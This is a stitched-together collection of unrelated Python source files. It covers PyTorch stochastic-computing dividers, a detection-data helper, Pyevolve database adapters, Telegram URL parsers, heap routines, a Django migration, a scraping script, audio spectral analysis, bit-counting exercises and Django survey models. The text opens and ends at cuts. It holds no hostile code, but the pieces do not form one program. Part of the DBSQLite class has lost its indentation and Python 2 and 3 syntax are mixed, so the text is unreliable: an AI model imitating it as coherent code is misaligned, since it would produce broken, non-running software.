        sign_dividend, abs_dividend = self.abs_dividend(dividend)
        sign_divisor, abs_divisor = self.abs_divisor(divisor)
        uni_abs_dividend = self.bi2uni_dividend(abs_dividend)
        uni_abs_divisor = self.bi2uni_divisor(abs_divisor)
        uni_abs_quotient = self.unipolar_forward(uni_abs_dividend, uni_abs_divisor)
        bi_abs_quotient = self.uni2bi_quotient(uni_abs_quotient)
        bi_quotient = sign_dividend.type(torch.int8) ^ sign_divisor.type(torch.int8) ^ bi_abs_quotient.type(torch.int8)
        return bi_quotient
    def unipolar_forward(self, dividend, divisor):
        # synchronize the two streams, then run the correlated-division kernel
        dividend_sync, divisor_sync = self.ssync(dividend, divisor)
        quotient = self.cordiv_kernel(dividend_sync, divisor_sync)
        return quotient
    def forward(self, dividend, divisor):
        # see BUG FIX note in __init__: `==` instead of `is` for string compare
        if self.mode == "bipolar":
            output = self.bipolar_forward(dividend, divisor)
        else:
            output = self.unipolar_forward(dividend, divisor)
        return output.type(self.stype)
class GainesDiv(torch.nn.Module):
    """
    this module is for Gaines division.

    A saturating up/down counter tracks the quotient estimate; the output
    bit is produced by comparing the counter against a random number.
    """
    def __init__(self,
                 depth=5,
                 mode="bipolar",
                 rng="Sobol",
                 rng_dim=1,
                 stype=torch.float):
        super(GainesDiv, self).__init__()
        # data representation
        self.mode = mode
        self.scnt_max = torch.nn.Parameter(torch.tensor([2**depth-1]).type(torch.float), requires_grad=False)
        self.scnt = torch.nn.Parameter(torch.tensor([2**(depth-1)]).type(torch.float), requires_grad=False)
        self.rng = RNG(depth, rng_dim, rng, torch.float)()
        self.rng_idx = torch.nn.Parameter(torch.zeros(1).type(torch.long), requires_grad=False)
        self.divisor_d = torch.nn.Parameter(torch.zeros(1).type(torch.int8), requires_grad=False)
        self.stype = stype
    def forward(self, dividend, divisor):
        # output is the same for both bipolar and unipolar
        output = torch.gt(self.scnt, self.rng[self.rng_idx%self.rng.numel()]).type(torch.int8)
        self.rng_idx.data = self.rng_idx + 1
        output = output + torch.zeros_like(dividend, dtype=torch.int8)
        # BUG FIX: the original used `self.mode is "unipolar"` - `is` tests
        # object identity, not string equality, which is fragile (depends on
        # CPython string interning) and a SyntaxWarning since Python 3.8.
        if self.mode == "unipolar":
            inc = dividend.type(torch.float)
            dec = (output & divisor.type(torch.int8)).type(torch.float)
        else:
            # XNOR of current dividend/divisor and of delayed/current divisor
            dd_ds = 1 - (dividend.type(torch.int8) ^ divisor.type(torch.int8))
            ds_ds = 1 - (self.divisor_d ^ divisor.type(torch.int8))
            self.divisor_d.data = divisor.type(torch.int8)
            ds_ds_out = 1 - (ds_ds ^ (1 - output))
            inc = (dd_ds & ds_ds_out).type(torch.float)
            dec = ((1 - dd_ds) & (1 - ds_ds_out)).type(torch.float)
            # following implementation is not good for accuracy due to fluctuation of negative output.
            # inc = dividend.type(torch.float)
            # dec = (1 - output ^ divisor.type(torch.int8)).type(torch.float)
        # scnt is also the same in terms of the up/down behavior and comparison
        self.scnt.data = (inc * (self.scnt + 1) + (1 - inc) * self.scnt).view(dividend.size())
        self.scnt.data = (dec * (self.scnt - 1) + (1 - dec) * self.scnt)
        self.scnt.data = self.scnt.clamp(0, self.scnt_max.item())
        return output.type(self.stype)
|
import numpy as np
# import pandas as pd
from std_msgs.msg import UInt16
class DataResolver:
    """Numeric helpers for resolving detection data: coordinate averages,
    bounding-box averaging, Euclidean distance and inverse-trig angles."""

    def __init__(self):
        self.arr = []

    def avg_resolver(self, arr):
        """Drop NaN entries from *arr*, then return the [avg_x, avg_y] pair."""
        # pick out all NaN values
        self.arr = arr[np.logical_not(np.isnan(arr))]
        return self.cal_avg(self.arr)

    def cal_avg(self, arr):
        """Average a flat [x0, y0, x1, y1, ...] array into [avg_x, avg_y].

        Returns an empty list when *arr* is None (the original fell through
        to `return avg` with `avg` unbound, raising UnboundLocalError).
        """
        avg = []
        if arr is not None:
            [row] = arr.shape
            # BUG FIX: the original used dtype=UInt16 (the ROS std_msgs
            # message class), which numpy cannot interpret as a dtype;
            # the intended element type is np.uint16.
            x_arr = np.array([], dtype=np.uint16)
            y_arr = np.array([], dtype=np.uint16)
            # even positions are x coordinates, odd positions are y
            for i in range(row):
                if i % 2 == 0:
                    x_arr = np.append(x_arr, arr[i])
                else:
                    y_arr = np.append(y_arr, arr[i])
            try:
                avg = [np.mean(x_arr), np.mean(y_arr)]
            except ZeroDivisionError as e:
                print("no targets have been found!")
                print(e)
        return avg

    def box_resolver(self, bbox_lst):
        """Average a list of (x, y, w, h) boxes into one box tuple.

        Returns None for an empty list (the original fell through to
        `return box_tuple` with the name unbound, raising UnboundLocalError).
        """
        if not bbox_lst:
            print("There is no data in the bbox_lst.")
            return None
        num = len(bbox_lst)
        sum_x = sum(box[0] for box in bbox_lst)
        sum_y = sum(box[1] for box in bbox_lst)
        sum_w = sum(box[2] for box in bbox_lst)
        sum_h = sum(box[3] for box in bbox_lst)
        return (sum_x / num, sum_y / num, sum_w / num, sum_h / num)

    # This function can calculate the distance in the world coordination.
    def distance_resolver(self, start, end):
        """Euclidean distance between 2-D points *start* and *end*."""
        x_distance = np.square(start[0] - end[0])
        y_distance = np.square(start[1] - end[1])
        return np.sqrt(x_distance + y_distance)

    def angle_resolver(self, a, b, angle_type):
        """Angle in degrees whose sin/cos/tan equals a/b (ratio clamped to 1).

        :param angle_type: one of "sin", "cos", "tan"
        :raises ValueError: for an unknown *angle_type* (the original raised
            UnboundLocalError on the final `return angle` instead)
        """
        ratio = a / b
        if ratio > 1:
            ratio = 1
        if angle_type == "sin":
            inv = np.arcsin(ratio)
        elif angle_type == "cos":
            inv = np.arccos(ratio)
        elif angle_type == "tan":
            inv = np.arctan(ratio)
        else:
            raise ValueError("angle_type must be 'sin', 'cos' or 'tan'")
        return np.degrees(inv)
"""
:mod:`DBAdapters` -- database adapters for statistics
=====================================================================
.. warning:: the use the of a DB Adapter can reduce the performance of the
Genetic Algorithm.
Pyevolve have a feature in which you can save the statistics of every
generation in a database, file or call an URL with the statistics as param.
You can use the database to plot evolution statistics graphs later. In this
module, you'll find the adapters above cited.
.. seealso::
Method :meth:`GSimpleGA.GSimpleGA.setDBAdapter`
DB Adapters are set in the GSimpleGA Class.
"""
import Consts
import sqlite3
import logging
import types
import datetime
import Statistics
import urllib
import csv
class DBFileCSV:
   """ DBFileCSV Class - Adapter to dump statistics in CSV format

   Example:
      >>> adapter = DBFileCSV(filename="file.csv", identify="run_01",
                              frequency = 1, reset = True)

   :param filename: the CSV filename
   :param identify: the identify of the run
   :param frequency: the generational dump frequency
   :param reset: if is True, the file old data will be overwrite with the new

   """
   def __init__(self, filename=Consts.CDefCSVFileName, identify=None,
                frequency = Consts.CDefCSVFileStatsGenFreq, reset=True):
      """ The creator of DBFileCSV Class """
      # Default run identifier is a timestamp so concurrent runs stay distinct.
      if identify is None:
         self.identify = datetime.datetime.strftime(datetime.datetime.now(), "%d/%m/%y-%H:%M")
      else:
         self.identify = identify
      self.filename = filename
      self.statsGenFreq = frequency
      self.csvWriter = None
      self.fHandle = None
      self.reset = reset
   def __repr__(self):
      """ The string representation of adapter """
      ret = "DBFileCSV DB Adapter [File='%s', identify='%s']" % (self.filename, self.identify)
      return ret
   def open(self):
      """ Open the CSV file or creates a new file """
      logging.debug("Opening the CSV file to dump statistics [%s]", self.filename)
      # reset=True truncates the file; otherwise new rows are appended.
      if self.reset: open_mode = "w"
      else: open_mode = "a"
      self.fHandle = open(self.filename, open_mode)
      self.csvWriter = csv.writer(self.fHandle, delimiter=';')
   def close(self):
      """ Closes the CSV file handle """
      if self.fHandle:
         self.fHandle.close()
   def commitAndClose(self):
      """ Commits and closes """
      self.commit()
      self.close()
   def commit(self):
      """ Stub """
      pass
   def insert(self, stats, population, generation):
      """ Inserts the stats into the CSV file

      :param stats: statistics object (:class:`Statistics.Statistics`)
      :param population: population to insert stats (:class:`GPopulation.GPopulation`)
      :param generation: the generation of the insert

      """
      # Row layout: identify; generation; <all statistics fields>.
      line = [self.identify, generation]
      line.extend(stats.asTuple())
      self.csvWriter.writerow(line)
class DBURLPost:
   """ DBURLPost Class - Adapter to call an URL with statistics

   Example:
      >>> dbadapter = DBURLPost(url="http://localhost/post.py", identify="test")

   The parameters that will be sent is all the statistics described in the :class:`Statistics.Statistics`
   class, and the parameters:

   **generation**
      The generation of the statistics

   **identify**
      The id specified by user

   .. note:: see the :class:`Statistics.Statistics` documentation.

   :param url: the URL to be used
   :param identify: the identify of the run
   :param frequency: the generational dump frequency
   :param post: if True, the POST method will be used, otherwise GET will be used.

   """
   def __init__(self, url, identify=None,
                frequency = Consts.CDefURLPostStatsGenFreq, post=True):
      """ The creator of the DBURLPost Class. """
      # Default run identifier is a timestamp so concurrent runs stay distinct.
      if identify is None:
         self.identify = datetime.datetime.strftime(datetime.datetime.now(), "%d/%m/%y-%H:%M")
      else:
         self.identify = identify
      self.url = url
      self.statsGenFreq = frequency
      self.post = post
   def __repr__(self):
      """ The string representation of adapter """
      ret = "DBURLPost DB Adapter [URL='%s', identify='%s']" % (self.url, self.identify)
      return ret
   def open(self):
      """ Stub """
   def close(self):
      """ Stub """
      pass
   def commitAndClose(self):
      """ Stub """
      pass
   def commit(self):
      """ Stub """
      pass
   def insert(self, stats, population, generation):
      """ Sends the data to the URL using POST or GET

      :param stats: statistics object (:class:`Statistics.Statistics`)
      :param population: population to insert stats (:class:`GPopulation.GPopulation`)
      :param generation: the generation of the insert

      """
      logging.debug("Sending http request to %s.", self.url)
      response = None
      # All statistics fields plus generation/identify become request params.
      params = stats.internalDict.copy()
      params["generation"] = generation
      params["identify"] = self.identify
      if self.post: # POST
         response = urllib.urlopen(self.url, urllib.urlencode(params))
      else: # GET
         response = urllib.urlopen(self.url + "?%s" % (urllib.urlencode(params)))
      if response: response.close()
class DBSQLite:
""" DBSQLite Class - Adapter to dump data in SQLite3 database format
Example:
>>> dbadapter = DBSQLite(identify="test")
When you run some GA for the first time, you need to create the database, for this, you
must use the *resetDB* parameter:
>>> dbadapter = DBSQLite(identify="test", resetDB=True)
This parameter will erase all the database tables and will create the new ones.
The *resetDB* parameter is different from the *resetIdentify* parameter, the *resetIdentify*
only erases the rows with the same "identify" name.
:param dbname: the database filename
:param identify: the identify if the run
:param resetDB: if True, the database structure will be recreated
:param resetIdentify: if True, the identify with the same name will be overwrite with new data
:param frequency: the generational dump frequency
:param commit_freq: the commit frequency
"""
def __init__(self, dbname=Consts.CDefSQLiteDBName, identify=None, resetDB=False,
resetIdentify=True, frequency=Consts.CDefSQLiteStatsGenFreq,
commit_freq=Consts.CDefSQLiteStatsCommitFreq):
""" The creator of the DBSQLite Class """
if identify is None:
self.identify = datetime.datetime.strftime(datetime.datetime.now(), "%d/%m/%y-%H:%M")
else:
self.identify = identify
self.connection = None
self.resetDB = resetDB
self.resetIdentify = resetIdentify
self.dbName = dbname
self.typeDict = { types.FloatType : "real" }
self.statsGenFreq = frequency
self.cursorPool = None
self.commitFreq = commit_freq
def __repr__(self):
""" The string representation of adapter """
ret = "DBSQLite DB Adapter [File='%s', identify='%s']" % (self.dbName, self.identify)
return ret
def open(self):
""" Open the database connection """
logging.debug("Opening database, dbname=%s", self.dbName)
self.connection = sqlite3.connect(self.dbName)
if self.resetDB:
self.resetStructure(Statistics.Statistics())
if self.resetIdentify:
self.resetTableIdentify()
def commitAndClose(self):
""" Commit changes on database and closes connection """
self.commit()
self.close()
def close(self):
""" Close the database connection """
logging.debug("Closing database.")
if self.cursorPool:
self.cursorPool.close()
self.cursorPool = None
self.connection.close()
def commit(self):
""" Commit changes to database """
logging.debug("Commiting changes to database.")
self.connection.commit()
def getCursor(self):
""" Return a cursor from the pool
:rtype: the cursor
"""
if not self.cursorPool:
logging.debug("Creating new cursor for database...")
self.cursorPool = self.connection.cursor()
return self.cursorPool
else:
return self.cursorPool
def createStructure(self, stats):
""" Create table using the Statistics class structure
:param stats: the statistics object
"""
c = self.getCursor()
pstmt = "create table if not exists %s(identify text, generation integer, " % (Consts.CDefSQLiteDBTable)
for k, v in stats.items():
pstmt += "%s %s, " % (k, self.typeDict[type(v)])
pstmt = pstmt[:-2] + ")"
logging.debug("Creating table %s: %s.", Consts.CDefSQLiteDBTable, pstmt)
c.execute(pstmt)
pstmt = """create table if not exists %s(identify text, generation integer,
individual integer, fitness real, raw real)""" % (Consts.CDefSQLiteDBTablePop)
c.execute(pstmt)
self.commit()
   def resetTableIdentify(self):
      """ Delete all records on both tables carrying this run's identify tag. """
      c = self.getCursor()
      stmt = "delete from %s where identify = ?" % (Consts.CDefSQLiteDBTable)
      stmt2 = "delete from %s where identify = ?" % (Consts.CDefSQLiteDBTablePop)
      try:
         c.execute(stmt, (self.identify,))
         c.execute(stmt2, (self.identify,))
      except sqlite3.OperationalError, expt:
         # Missing tables usually mean the schema was never created for this
         # file; hint at the resetDB constructor flag instead of crashing.
         if expt.message.find("no such table") >= 0:
            print "\n ## The DB Adapter can't find the tables ! Consider enable the parameter resetDB ! ##\n"
      self.commit()
def resetStructure(self, stats):
""" Deletes de current structure and calls createStructure
:param stats: the statistics object
"""
logging.debug("Reseting structure, droping table and creating new empty table.")
c = self.getCursor()
c.execute("drop table if exists %s" % (Consts.CDefSQLiteDBTable,))
c.execute("drop table if exists %s" % (Consts.CDefSQLiteDBTablePop,))
self.commit()
self.createStructure(stats)
   def insert(self, stats, population, generation):
      """ Inserts the statistics data to database
      :param stats: statistics object (:class:`Statistics.Statistics`)
      :param population: population to insert stats (:class:`GPopulation.GPopulation`)
      :param generation: the generation of the insert
      """
      c = self.getCursor()
      # build "insert into <table> values (?, ?, ...)" with one placeholder
      # per statistics column
      pstmt = "insert into %s values (?, ?, " % (Consts.CDefSQLiteDBTable)
      for i in xrange(len(stats)):
         pstmt += "?, "
      pstmt = pstmt[:-2] + ")"
      c.execute(pstmt, (self.identify, generation) + stats.asTuple())
      pstmt = "insert into %s values(?, ?, ?, ?, ?)" % (Consts.CDefSQLiteDBTablePop,)
      # one row per individual: (identify, generation, index, fitness, raw score)
      tups = []
      for i in xrange(len(population)):
         ind = population[i]
         tups.append((self.identify, generation, i, ind.fitness, ind.score))
      c.executemany(pstmt, tups)
      # commit only every `commitFreq` generations to limit write overhead
      if (generation % self.commitFreq == 0):
         self.commit()
|
# =============================================================================
# Ural Telegram-related heuristic functions
# =============================================================================
#
# Collection of functions related to Telegram urls.
#
import re
from collections import namedtuple
from ural.ensure_protocol import ensure_protocol
from ural.utils import pathsplit, urlsplit, urlunsplit, safe_urlsplit, SplitResult
from ural.patterns import DOMAIN_TEMPLATE
# Message ids are plain runs of digits.
TELEGRAM_MESSAGE_ID_RE = re.compile(r"^\d+$")
# Hostname-suffix test for telegram domains (telegram.org, telegram.me, t.me).
TELEGRAM_DOMAINS_RE = re.compile(r"(?:telegram\.(?:org|me)|t\.me)$", re.I)
# Full-url test built from the shared DOMAIN_TEMPLATE.
TELEGRAM_URL_RE = re.compile(
    DOMAIN_TEMPLATE % r"(?:[^.]+\.)*(?:telegram\.(?:org|me)|t\.me)", re.I
)
# Host prefix replaced when converting to the public t.me/s mirror.
TELEGRAM_PUBLIC_REPLACE_RE = re.compile(
    r"^(?:[^.]+\.)?(?:telegram\.(?:org|me)|t\.me)", re.I
)
# Parse results: a message in a channel, an invite-only group, a channel.
TelegramMessage = namedtuple("TelegramMessage", ["name", "id"])
TelegramGroup = namedtuple("TelegramGroup", ["id"])
TelegramChannel = namedtuple("TelegramChannel", ["name"])
def is_telegram_message_id(value):
    """Return whether `value` is a digits-only string (a telegram message id)."""
    return TELEGRAM_MESSAGE_ID_RE.search(value) is not None
def is_telegram_url(url):
    """
    Function returning whether the given url is a valid Telegram url.

    Accepts either a raw url string or an already-split SplitResult, in
    which case only the hostname suffix is checked.

    Args:
        url (str): Url to test.

    Returns:
        bool: Whether given url is from Telegram.
    """
    if isinstance(url, SplitResult):
        return TELEGRAM_DOMAINS_RE.search(url.hostname) is not None
    return TELEGRAM_URL_RE.match(url) is not None
def convert_telegram_url_to_public(url):
    """
    Function parsing the given telegram url and returning the public
    (t.me/s/...) version of it, preserving the presence or absence of a
    protocol in the input.
    """
    safe_url = ensure_protocol(url)
    # if ensure_protocol changed nothing, the caller already had a scheme
    has_protocol = safe_url == url
    scheme, netloc, path, query, fragment = urlsplit(safe_url)
    if not is_telegram_url(netloc):
        raise TypeError(
            "ural.telegram.convert_telegram_url_to_public: %s is not a telegram url"
            % url
        )
    # swap the host for the public mirror; the "/s" segment ends up joined
    # onto the path when the parts are reassembled below
    netloc = re.sub(TELEGRAM_PUBLIC_REPLACE_RE, "t.me/s", netloc)
    result = (scheme, netloc, path, query, fragment)
    result = urlunsplit(result)
    # strip the protocol again if the input had none
    if not has_protocol:
        result = result.split("://", 1)[-1]
    return result
def parse_telegram_url(url):
    """
    Function parsing the given url and returning either a TelegramMessage,
    TelegramChannel, TelegramGroup or None if nothing of information could be
    found.

    Bug fix: the original read path[1] before checking the path length, so
    a bare public url such as "t.me/s" raised IndexError instead of
    returning None.

    Args:
        url (str): Url to parse.
    """
    if not is_telegram_url(url):
        return None
    parsed = safe_urlsplit(url)
    path = pathsplit(parsed.path)
    if not path:
        return None
    if path[0] == "s":
        # public (t.me/s/...) urls: everything is shifted by one segment
        if len(path) > 1 and path[1] == "joinchat":
            if len(path) == 3:
                return TelegramGroup(id=path[2])
            return None
        if len(path) == 3 and is_telegram_message_id(path[2]):
            return TelegramMessage(name=path[1], id=path[2])
        if len(path) == 2:
            return TelegramChannel(name=path[1])
        return None
    if path[0] == "joinchat":
        if len(path) == 3:
            return TelegramGroup(id=path[2])
        if len(path) == 2:
            return TelegramGroup(id=path[1])
        return None
    if len(path) == 2 and is_telegram_message_id(path[1]):
        return TelegramMessage(name=path[0], id=path[1])
    if len(path) == 1:
        return TelegramChannel(name=path[0])
    return None
def extract_channel_name_from_telegram_url(url):
    """Return the channel (or message) name for the url, or None for groups
    and unparsable urls."""
    result = parse_telegram_url(url)
    if result is None or isinstance(result, TelegramGroup):
        return None
    return result.name
|
def get_left(index):
    """Index of the left child of the node at `index` in an array-backed heap."""
    return index * 2 + 1
def get_right(index):
    """Index of the right child of the node at `index` in an array-backed heap."""
    return (index + 1) * 2
def min_heapify(arr, index):
    """Sift arr[index] down until the subtree rooted at `index` is a min-heap.

    Both child subtrees are assumed to already satisfy the heap property.
    Operates in place; recursion depth is O(log n).
    """
    size = len(arr)
    smallest = index
    for child in (2 * index + 1, 2 * index + 2):
        if child < size and arr[child] < arr[smallest]:
            smallest = child
    if smallest != index:
        arr[index], arr[smallest] = arr[smallest], arr[index]
        min_heapify(arr, smallest)
def build_min_heap(arr):
    """Rearrange `arr` in place into a min-heap (bottom-up heapify).

    len(arr) // 2 - 1 is the last internal node; leaves are already
    trivially heaps, so we sift down from there back to the root.
    (The redundant int() around the floor division was dropped.)
    """
    for index in range(len(arr) // 2 - 1, -1, -1):
        min_heapify(arr, index)
def heap_extract_min(A):
    """Pop and return the smallest element of the min-heap `A`.

    Bug fix: the original copied A[-1] over A[0] but never removed the
    last slot, so the heap kept its length and held a duplicate of the
    last element.  We now pop the tail before re-heapifying.

    Returns A itself (the empty list) when the heap is empty, preserving
    the original degenerate-case behavior.
    """
    if len(A) < 1:
        return A
    min_value = A[0]
    last = A.pop()
    if A:
        A[0] = last
        min_heapify(A, 0)
    return min_value
if __name__ == '__main__':
    # Smoke test: heapify a small list and print the resulting array layout.
    a = [3, 9, 2, 1, 4, 5]
    build_min_heap(a)
    print(a)
|
# Generated by Django 3.1.6 on 2021-08-19 10:14
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a nullable slug to Rooms and redefine room_id as a 6-char field.
    Auto-generated by Django; avoid hand-editing applied migrations.
    """
    dependencies = [
        ('firstApp', '0016_rooms_room_id'),
    ]
    operations = [
        migrations.AddField(
            model_name='rooms',
            name='slug',
            field=models.SlugField(null=True),
        ),
        migrations.AlterField(
            model_name='rooms',
            name='room_id',
            # NOTE(review): 'HM0UEE' looks like the frozen result of a callable
            # default evaluated at makemigrations time — confirm the model uses
            # a callable default, or every new row gets this same id.
            field=models.CharField(default='HM0UEE', max_length=6),
        ),
    ]
|
import numpy as np
randn = np.random.randn
import pandas as pd
from bs4 import BeautifulSoup
from urllib2 import urlopen
from pandas.io.parsers import TextParser
import pandas.io.parsers as pdp
from pandas.io.data import DataReader
# simple cell formatters used below (remove_w is currently unused)
f = lambda x: str(x)
remove_w = lambda x: x.strip()
# fetch the live economic-calendar page and locate the calendar table
# (tables[1] on the page layout this script was written against)
buf = urlopen('http://www.tradingeconomics.com/calendar?g=world')
soup = BeautifulSoup(buf)
body = soup.body
tables = body.findAll('table')
# for i in tables:print 'i.attrs'
calls = tables[1]
# for property, value in vars(calls).iteritems():
# print property, ": ", value
# print '----------'
# print calls.attrs
rows = calls.findAll('tr')
def _unpack(row, kind='td'):
    """Extract the text of every `kind` cell in one table row."""
    cells = row.findAll(kind)
    return [cell.text for cell in cells]
def parse_options_data(table):
    """Parse the calendar HTML table into a string-valued DataFrame.

    Header names come from the first row's <th> cells; data rows with four
    or fewer cells are discarded, every remaining cell is whitespace-
    stripped, and the result is fed through pandas' TextParser before all
    values are coerced to str.
    """
    all_rows = table.findAll('tr')
    header = _unpack(all_rows[0], kind='th')
    raw = [_unpack(r) for r in all_rows[1:]]
    # keep only rows that actually carry calendar data
    kept = [row for row in raw if len(row) > 4]
    cleaned = [[cell.strip() for cell in row] for row in kept]
    frame = TextParser(cleaned, names=header).get_chunk()
    return frame.applymap(f)
call_data = parse_options_data(calls)
# Python 2 print statement: dump the parsed calendar, then save it locally.
print call_data.head(200).to_string()
# NOTE(review): the backslash path relies on Python 2 string semantics; under
# Python 3 the "\U" sequence is a syntax error — use a raw string or forward
# slashes if this is ever ported.
call_data.to_csv("C:\Users\oskar\Documents\doc_no_backup\python_crap\excel\deol.csv")
from typing import Optional
import librosa
from librosa import display
import matplotlib.pyplot as plt
import numpy as np
import scipy
from librosa.display import specshow
from scipy.fftpack import fft, fftfreq
from scipy.io import wavfile
from sympy.stats.drv_types import scipy
class SpectraAnalysis:
    """Audio spectral-analysis helpers: waveform display, FFT magnitude,
    log-power spectrogram and spectral mean frequency.

    When `debug` is true the methods also render matplotlib plots.
    """

    iterator = 1   # class-level counter; unused in the code shown here
    debug = True   # when True, plotting side effects are enabled

    def spectra(self, name_of_audio_file):
        """Load an audio file as mono at its native sample rate and, in
        debug mode, plot the waveform."""
        samples, sampleRate = librosa.load(name_of_audio_file, sr=None, mono=True, offset=0.0,
                                           duration=None)
        if self.debug:
            plt.figure()
            # NOTE(review): librosa.display.waveplot was removed in
            # librosa >= 0.10 (replaced by waveshow) — confirm the pinned
            # librosa version still provides it.
            librosa.display.waveplot(y=samples, sr=sampleRate)
            plt.xlabel("Time (Seconds)")
            plt.ylabel("Amplitude")
            plt.tight_layout()
            plt.show()

    def fastFourierTransform(self, data, sampleRate):
        """Compute the FFT of `data` and, in debug mode, plot the
        single-sided magnitude spectrum.

        :param data: 1-D array of audio samples
        :param sampleRate: sampling rate in Hz
        """
        sampleLength = len(data)
        time = 1 / sampleRate
        # Bug fix: the original called scipy.fft(data), but the module-level
        # `from sympy.stats.drv_types import scipy` shadows the real scipy,
        # and in modern SciPy `scipy.fft` is a module (not callable) anyway.
        # Use the fft function imported from scipy.fftpack instead.
        yAxis = fft(data)
        xAxis = np.linspace(0.0, 1.0 / (2.0 * time), sampleLength // 2)
        if self.debug:
            figure, graph = plt.subplots()
            graph.plot(xAxis, 2.0 / sampleLength * np.abs(yAxis[:sampleLength // 2]))
            plt.grid()
            plt.xlabel("Frequency (Hz)")
            plt.ylabel("Magnitude")
            plt.show()

    def spectrogram(self, samples, sample_rate, stride_ms=10.0,
                    window_ms=20.0, max_freq=22050, eps=1e-14):
        """Compute a log-power spectrogram via a Hann-weighted strided STFT.

        :param samples: 1-D numpy array of audio samples
        :param sample_rate: sampling rate in Hz
        :param stride_ms: hop between windows in milliseconds
        :param window_ms: window length in milliseconds
        :param max_freq: highest frequency bin (Hz) kept in the output
        :param eps: floor added before the log to avoid log(0)
        """
        stride_size = int(0.001 * sample_rate * stride_ms)
        window_size = int(0.001 * sample_rate * window_ms)
        # Extract strided windows (zero-copy view over `samples`)
        truncate_size = (len(samples) - window_size) % stride_size
        samples = samples[:len(samples) - truncate_size]
        nshape = (window_size, (len(samples) - window_size) // stride_size + 1)
        nstrides = (samples.strides[0], samples.strides[0] * stride_size)
        windows = np.lib.stride_tricks.as_strided(samples,
                                                  shape=nshape, strides=nstrides)
        assert np.all(windows[:, 1] == samples[stride_size:(stride_size + window_size)])
        # Window weighting, squared Fast Fourier Transform (fft), scaling
        weighting = np.hanning(window_size)[:, None]
        fft_mat = np.fft.rfft(windows * weighting, axis=0)
        fft_mat = np.absolute(fft_mat)
        fft_mat = fft_mat ** 2
        scale = np.sum(weighting ** 2) * sample_rate
        # interior bins carry both positive and negative frequencies -> x2
        fft_mat[1:-1, :] *= (2.0 / scale)
        fft_mat[(0, -1), :] /= scale
        # Prepare fft frequency list
        freqs = float(sample_rate) / window_size * np.arange(fft_mat.shape[0])
        # Compute spectrogram feature, keeping bins up to max_freq
        ind = np.where(freqs <= max_freq)[0][-1] + 1
        spectrogram = np.log(fft_mat[:ind, :] + eps)
        if self.debug:
            specshow(spectrogram, x_axis="time", y_axis="hz")

    def meanFrequency(self, data: np.ndarray, samplingFrequency: int) -> float:
        """Return the amplitude-weighted mean frequency (Hz) of the rFFT
        spectrum of `data`."""
        spec = np.abs(np.fft.rfft(data))
        frequency = np.fft.rfftfreq(len(data), d=1 / samplingFrequency)
        amplitude = spec / spec.sum()
        meanFrequency = (frequency * amplitude).sum()
        return meanFrequency
|
#!/bin/python
import sys
# Example: 15 == 0b1111 has four set bits.
example_one = 15
expected = 4
def find_count(input_int):
    """Count set bits by scanning every bit position covered by the
    integer object's size in memory (sys.getsizeof * 8)."""
    total_bits = sys.getsizeof(input_int) * 8
    ones = 0
    for _ in range(total_bits):
        ones += input_int & 1
        input_int >>= 1
    return ones
def find_count_while(input_int):
    """Count set bits, looping only while bits remain (positive ints)."""
    ones = 0
    while input_int > 0:
        ones += input_int & 1
        input_int >>= 1
    return ones
def find_count_division(input_int):
    """Count set bits using the modulo/division method.

    Bug fix: use floor division (//).  Under Python 3 the original true
    division produced floats, after which the parity test (x % 2) == 1
    silently failed and the count came out wrong; // keeps the original
    Python 2 integer-division behavior on both interpreters.
    """
    one_count = 0
    while input_int > 0:
        if (input_int % 2) == 1:
            one_count += 1
        input_int = input_int // 2
    return one_count
# Sanity checks: all three implementations must agree on the example.
returned = find_count(example_one)
assert expected == returned
returned = find_count_while(example_one)
assert expected == returned
returned = find_count_division(example_one)
assert expected == returned
# Python 2 print statement.
print 'W00T we passed.'
|
from django.db import models
class Approach(models.Model):
    """A testing approach, carrying a description and an aggregate score."""
    id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=30)
    description = models.CharField(max_length=500)
    score = models.FloatField()

    def __str__(self):
        return '[ID: {:d}, Approach: {}, Score: {:f}]'.format(self.id, self.name, self.score)
class Tool(models.Model):
    """A concrete tool, linked to the Approach it implements."""
    id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=30)
    description = models.CharField(max_length=500)
    score = models.FloatField()
    approach = models.ForeignKey(Approach, on_delete=models.CASCADE)

    def __str__(self):
        return f'[ID: {self.id:d}, Tool: {self.name}, Score: {self.score:f}, Approach: {self.approach}]'
class Scale_Choice(models.Model):
    """A Likert-scale answer option: display text plus its 1-5 value."""
    id = models.AutoField(primary_key=True)
    #----------
    # Likert values, 5 (strongest agreement) down to 1 (strongest disagreement)
    TOTALLY_AGREE = 5
    AGREE = 4
    NEITHER_AGREE_NOR_DISAGREE = 3
    DISAGREE = 2
    TOTALLY_DISAGREE = 1
    SCALE_CHOICES = (
        (TOTALLY_AGREE, 'Totally Agree'),
        (AGREE, 'Agree'),
        (NEITHER_AGREE_NOR_DISAGREE, 'Neither agree nor disagree'),
        (DISAGREE, 'Disagree'),
        (TOTALLY_DISAGREE, 'Totally disagree'),
    )
    scale_choice_txt = models.CharField(max_length=30, default='null')
    scale_choice_value = models.PositiveIntegerField(
        choices = SCALE_CHOICES,
        default = TOTALLY_AGREE,
    )
    def __str__(self):
        return '[Choice: %s, Value: %d]' % (self.scale_choice_txt, self.scale_choice_value)
class Dicotomic_Choice(models.Model):
    """A yes/no answer option; Yes scores 5 and No scores 1 so results are
    comparable with the 1-5 Likert scale."""
    id = models.AutoField(primary_key=True)
    #----------
    YES = 5
    NO = 1
    DICOTOMIC_CHOICES = (
        (YES, 'Yes'),
        (NO, 'No'),
    )
    dicotomic_choice_txt = models.CharField(max_length=5, default='null')
    dicotomic_choice_value = models.PositiveIntegerField(
        choices = DICOTOMIC_CHOICES,
        default = YES,
    )
    def __str__(self):
        return '[Choice: %s, Value: %d]' % (self.dicotomic_choice_txt, self.dicotomic_choice_value)
class Question(models.Model):
    """A survey question attached to either a Tool or an Approach (both
    nullable), answered either on a scale or yes/no ('dicotomic')."""
    id = models.AutoField(primary_key=True)
    question_text = models.CharField(max_length=200)
    tool = models.ForeignKey(Tool,
                             null=True,
                             blank=True,
                             on_delete=models.CASCADE)
    approach = models.ForeignKey(Approach,
                                 null=True,
                                 blank=True,
                                 on_delete=models.CASCADE
                                 )
    #-----
    # answer-style discriminator
    SCALE = 'scale'
    DICOTOMIC = 'dicotomic'
    type_choices = (
        (SCALE, 'Scale'),
        (DICOTOMIC, 'Dicotomic')
    )
    type = models.CharField(
        max_length=30,
        choices=type_choices,
        default=SCALE
    )
    def __str__(self):
